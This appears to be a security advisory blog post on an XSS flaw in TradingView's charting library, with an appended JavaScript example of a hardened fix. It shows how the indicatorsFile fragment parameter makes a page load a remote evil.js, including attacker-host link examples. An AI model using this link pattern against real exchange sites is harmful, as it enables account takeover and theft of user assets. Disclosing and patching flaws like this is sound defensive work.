Topic: Recurrence, Analysis and Solution on TradingView XSS Vulnerability
Recently, a security platform disclosed a high-risk vulnerability in TradingView. The security team of RatingToken from the Cheetah Mobile Blockchain Security Center immediately assisted multiple partner digital currency exchanges in testing and repairing the TradingView XSS vulnerability. The details are as follows:

Background:

TradingView, an open source and free candlestick chart analysis tool, is widely used by digital currency and stock exchanges. XSS vulnerabilities can bypass existing defense mechanisms to compromise user accounts, or even transfer their assets arbitrarily.

Recurrence:

We found the vulnerability by testing the official website of an exchange.

Accessing https://www.***.com/assets/chart/charting_library/static, we traversed the directory and found the file where the vulnerability lies.

https://cdn-images-1.medium.com/max/800/1*WpGF4q_0_sOaxpdWhmLzaQ.png

/charting_library/static/tv-chart.630b704a2b991e1354cb09.html (the hash 630b704a2b991e1354cb09 may differ between deployments) references the script bundles/library.19c99ed5d03091e1354cb09.js (the hash 19c99ed5d03091e1354cb09 may also differ between deployments).

https://cdn-images-1.medium.com/max/800/1*HF_Fau77r2wOKHc2nudBjw.png

Accessing

https://www.***.com/assets/chart/charting_library/static/tvchart.630b704a2b9d0eaf1593.html#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=https://***/evil.js

we can see from the picture below that the .js script has been executed.

https://cdn-images-1.medium.com/max/800/1*juRxoQFhQmOr8zLyI2-gRA.png

Analysis:

In the reproduction above, it can be seen that three parameters are required: disabledFeatures, enabledFeatures and indicatorsFile.

https://cdn-images-1.medium.com/max/800/1*lfXxWjPUAAUz0Wq-JyLkuA.png

It can be seen in the code that the disabledFeatures and enabledFeatures parameters are in an invalid format, and therefore throw errors and stop there.

indicatorsFile, the parameter that is critical to the vulnerability, is used in the code as follows:

https://cdn-images-1.medium.com/max/800/1*edbiS4XlXfU28jqijaq8tg.png

$.getScript loads and executes a JavaScript file from the server via an HTTP GET request.

If the victim clicks a link constructed as above, the remote malicious .js file supplied by the attacker will be executed, which results in compromised user accounts, malicious wallet operations and asset loss.

Defense plan:

The temporary solution that users can apply themselves is:

Disable the indicatorsFile parameter in the .js file whose name starts with library under the bundles directory of the TradingView library.

RatingToken: https://ratingtoken.io/?from=medium
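The vulnerable pattern the post describes, an attacker-controlled fragment parameter handed straight to a script loader, shown beside a hardened version. This is an added example and not TradingView's, the exchange's or RatingToken's code: it assumes a page origin of https://www.example.com, an indicators directory under /assets/chart/charting_library/indicators/, and a loadScript callback standing in for $.getScript. The post's temporary fix disables the parameter outright; the hardened function keeps it but accepts only same-origin paths under a fixed prefix, which also refuses protocol-relative URLs, javascript: URLs, userinfo tricks (https://www.example.com@attacker/...) and ../ traversal.

```javascript
// Added example (not TradingView's, the exchange's or RatingToken's code).
// Hostnames, paths and function names below are assumptions for illustration.
// parseFragmentParams mimics reading "#key=value&key=value" from location.hash;
// the loadScript callback stands in for jQuery's $.getScript.

function safeDecode(s) {
  // decodeURIComponent throws on malformed escapes such as "%zz"; keep the raw text then.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function parseFragmentParams(hash) {
  // "#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=..." -> { key: value }
  const params = {};
  for (const pair of hash.replace(/^#/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = safeDecode(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? '' : safeDecode(pair.slice(eq + 1));
    params[key] = value;
  }
  return params;
}

// Vulnerable pattern: whatever URL the fragment names is fetched and executed.
function loadIndicatorsVulnerable(hash, loadScript) {
  const { indicatorsFile } = parseFragmentParams(hash);
  if (!indicatorsFile) return null;
  return loadScript(indicatorsFile); // the attacker controls this argument
}

// Hardened pattern: resolve the value against the page origin and accept only
// same-origin paths under a fixed prefix. Returns the absolute URL that may be
// loaded, or null when the value must be refused.
function resolveIndicatorsUrl(hash, pageOrigin, allowedPrefix) {
  const { indicatorsFile } = parseFragmentParams(hash);
  if (!indicatorsFile) return null;
  let resolved;
  try {
    resolved = new URL(indicatorsFile, pageOrigin);
  } catch (e) {
    return null; // unparsable value
  }
  // Rejects https://attacker/..., //attacker/... (protocol-relative),
  // javascript:... (origin "null") and https://www.example.com@attacker/...
  if (resolved.origin !== new URL(pageOrigin).origin) return null;
  // URL parsing already collapses "/../" segments, so a plain prefix check suffices.
  if (!resolved.pathname.startsWith(allowedPrefix)) return null;
  return resolved.href;
}

function loadIndicatorsHardened(hash, pageOrigin, allowedPrefix, loadScript) {
  const url = resolveIndicatorsUrl(hash, pageOrigin, allowedPrefix);
  return url === null ? null : loadScript(url);
}

// Stand-alone demo with a constructed attacker link (assumed hostnames).
if (typeof require !== 'undefined' && require.main === module) {
  const attackerLink =
    '#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=https://attacker.example/evil.js';
  const record = (u) => `would load ${u}`;
  console.log('vulnerable:', loadIndicatorsVulnerable(attackerLink, record));
  console.log('hardened  :', loadIndicatorsHardened(
    attackerLink, 'https://www.example.com',
    '/assets/chart/charting_library/indicators/', record));
}
```

The origin comparison is the part that matters: string-prefix checks on the raw value ("starts with /assets/") are bypassed by //attacker.example/..., so the value is always parsed with the WHATWG URL parser first and only the normalized result is inspected.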